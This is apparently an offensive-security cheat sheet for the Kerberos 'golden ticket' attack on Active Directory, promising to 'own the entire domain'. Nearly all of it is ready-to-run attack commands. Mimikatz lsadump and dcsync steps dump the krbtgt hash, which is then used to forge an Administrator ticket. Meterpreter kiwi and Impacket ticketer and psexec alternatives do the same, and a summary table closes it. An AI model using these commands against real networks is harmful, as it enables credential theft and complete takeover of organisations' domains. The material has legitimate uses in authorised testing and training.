# Golden Ticket

## GOLDEN TICKET

### Dump krbtgt hash to own the entire domain!

**1)**

```
mimikatz.exe
```

**2)**

```
privilege::debug
```

**3)**

```
lsadump::lsa /inject /name:krbtgt
```

**4)**

```
lsadump::lsa /patch
```

**5)**

```
lsadump::trust /patch
```

**6)**

```
lsadump::dcsync /user:krbtgt
```

**7)**

```
kerberos::purge
```

**8)**

```
kerberos::golden /user:Administrator /domain:domain.local /sid:SID /krbtgt:NTLM HASH /id:500(Admin) or 1103(Service)
```

**9)**

```
kerberos::tgt
```

**10)**

```
misc::cmd
```

### Alternate method: Meterpreter shell

#### Get information for golden ticket

**1)**

```
dcsync_ntlm krbtgt
```

**2)**

```
dcsync krbtgt
```

#### Forge a Golden Ticket

**3)**

```
load kiwi
```

**4)**

```
golden_ticket_create -d DOMAIN_NAME -k NTLM_HASH_OF_KRBTGT -s SID -u Administrator
```

**5)**

```
kerberos_ticket_purge
```

**6)**

```
kerberos_ticket_use /root/Downloads/Administrator.tck
```

**7)**

```
kerberos_ticket_list
```

#### Authenticate with psexec impacket (Linux)

**8)**

```
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
```

### Alternate Method: Impacket Ticketer

**1)**

```
python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
```

**2)**

```
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
```

**3)**

```
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
```

## Golden Ticket

| Command                                                                                                              | Description                                                                                                                    |
| -------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ |
| `lsadump::dcsync /domain:eagle.local /user:krbtgt`                                                                   | Command used in `mimikatz` to DCSync and dump the `krbtgt` password hash                                                       |
| `Get-DomainSID`                                                                                                      | Cmdlet from `PowerView` used to obtain the SID value of the domain.                                                            |
| `golden /domain:eagle.local /sid:<domain sid> /rc4:<rc4 hash> /user:Administrator /id:500 /renewmax:7 /endin:8 /ptt` | Command used in `mimikatz` to forge a golden ticket for the `Administrator` account and pass the ticket to the current session |
| `klist`                                                                                                              |                                                                                                                                |